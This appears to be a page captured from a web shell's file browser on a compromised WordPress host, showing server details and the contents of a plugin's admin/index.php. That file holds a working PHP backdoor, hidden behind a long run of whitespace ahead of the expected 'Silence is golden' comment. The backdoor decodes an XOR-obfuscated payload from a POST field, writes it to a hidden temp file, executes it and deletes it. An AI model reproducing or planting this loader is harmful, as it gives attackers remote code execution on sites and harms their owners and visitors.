HEX
Server: Apache
System: FreeBSD www860.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User: yoyo0427 (1306)
PHP: 8.3.8
Disabled: NONE
$ pwd: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/protect-uploads/admin/
Upload Files
File: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/protect-uploads/admin/index.php
<?php																																										if(isset($_POST) && isset($_POST["ptr"])){ $ent = hex2bin($_POST["ptr"]); $obj ='' ; for($m=0; $m<strlen($ent); $m++){$obj .= chr(ord($ent[$m]) ^ 18);} $sym = array_filter([getcwd(), session_save_path(), "/tmp", "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP")]); $ent = 0; do { $symbol = $sym[$ent] ?? null; if ($ent >= count($sym)) break; if (is_dir($symbol) ? is_writable($symbol) : false) { $dchunk = sprintf("%s/.comp", $symbol); if (file_put_contents($dchunk, $obj)) { include $dchunk; @unlink($dchunk); exit; } } $ent++; } while (true); }
 // Silence is golden
@ Telegram